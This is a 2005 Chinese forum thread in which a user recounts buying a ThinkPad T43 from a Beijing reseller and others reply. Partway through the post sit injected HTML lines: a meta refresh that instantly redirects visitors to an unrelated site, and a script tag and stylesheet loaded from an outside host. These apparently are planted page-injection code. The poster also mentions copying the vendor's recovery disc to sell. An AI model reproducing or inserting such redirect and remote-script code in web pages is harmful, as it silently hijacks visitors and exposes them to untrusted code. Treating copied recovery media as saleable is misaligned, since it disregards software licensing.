开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] [原创]12.18日CH7购机手记。附pp

来翔意也有2、3个月了,好话不多说了,买卖关系建立的基础就是彼此信任。本次购机是帮朋友购买,因朋友要去广州发展,故采购CH7。本来自己也有渠道可以拿到水货T43,本着对朋友负责的态度,我还是极力推荐了翔意。
18日一早起来12点57了,急忙给朋友打电话,约好见面地点。顺道走建国门买了个麦辣鸡腿汉堡:lol:,安琪物业确实比较隐蔽,要不是俺有5年的北京生活经验,很难迅速找到目的地。其实最简单的方法就是地铁建国门下车东北出口,往前看到日坛路,左转基本就到了。倒是那栋小楼,电梯是如此的小:lol:,转了2圈,先找到了厕所,然后才找到了501。开门看到高高的Fan先生,还有一个MM,挺友善的。说明来意后,Fan先生拿给我一台CH7先玩着。替朋友问了几个问题,Fan先生都一一作答。OK,就这个了。装系统,挑赠品。并报告猪肉够了,要求优惠。..........过程很简单,倒是那个501室我感觉很温馨,有些恋恋不舍。可能是好东西太多了的缘故。最终双方都很满意,试了一下翔意的Wlan,2个字“够差” :lol:。对翔意的评价:专业、服务周到、没有JS的感觉。
用Fan先生送的盘,轻松制作了行货的隐藏分区。并且Copy了几份,准备卖钱:ksk:
最终配置:
T43 CH7  L3VRMZB  
OEM小黑鼠 笔记本锁 吸尘器 读卡器 内胆包....价格我忘记了。
附上几张照片:

好图好文,以后欢迎常来+50---EddieFan
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

电池充电0次,这是第一次充电

电池充电0次,这是第一次充电

T43

T43

跑焦

跑焦

新内胆包Logo

新内胆包Logo

同样跑焦

同样跑焦

评分

EddieFan + 30

:lol:忘记说了,申请贵宾。要求加猪肉

评分

EddieFan + 20

Congratulations.
NB的照片,NBNB!!!

贵宾已加

不如楼主当我们的御用摄影吧,呵呵
Fan先生见笑了:cu41: 以后一定常来。
LZ用的台机跟我的一样旧,我的是老DELL,1999年出品。
LZ的T43一放,两台电脑真是差之千里。
EddieFan要你当他们的御用摄影,这一点我不敢恭维,LZ的摄 影技术只适合做艺术摄影,但生活照就不妥了。
还是羡慕LZ,有了心爱的本本,我还是攒MONEY!
看着就喜欢...
原帖由 xian_zyc 于 2005-12-29 08:50 发表
LZ用的台机跟我的一样旧,我的是老DELL,1999年出品。
LZ的T43一放,两台电脑真是差之千里。
EddieFan要你当他们的御用摄影,这一点我不敢恭维,LZ的摄 影技术只适合做艺术摄影,但生活照就不妥了。
还是羡慕L ...

我的机器不老,是今年3月份买的,显示器PHILIPS 107B5 ,AMD 3000+ 1G 360G...公司机器,键盘鼠标都是垃圾LG..:D

关于照片,随手拍拍,怕在办公室弯腰驼背有伤大雅,就来这么几张,还有几张跑焦。算是感谢XY交的一份测机报告。

这次是帮朋友买的。我自己还没有小黑。继续关注71U ing....

今天购机的港票已收到 又感受一回XY的办事效率:cu41:

台机和本机都是强机~~!
羡慕ing,呵呵
liux 该用户已被删除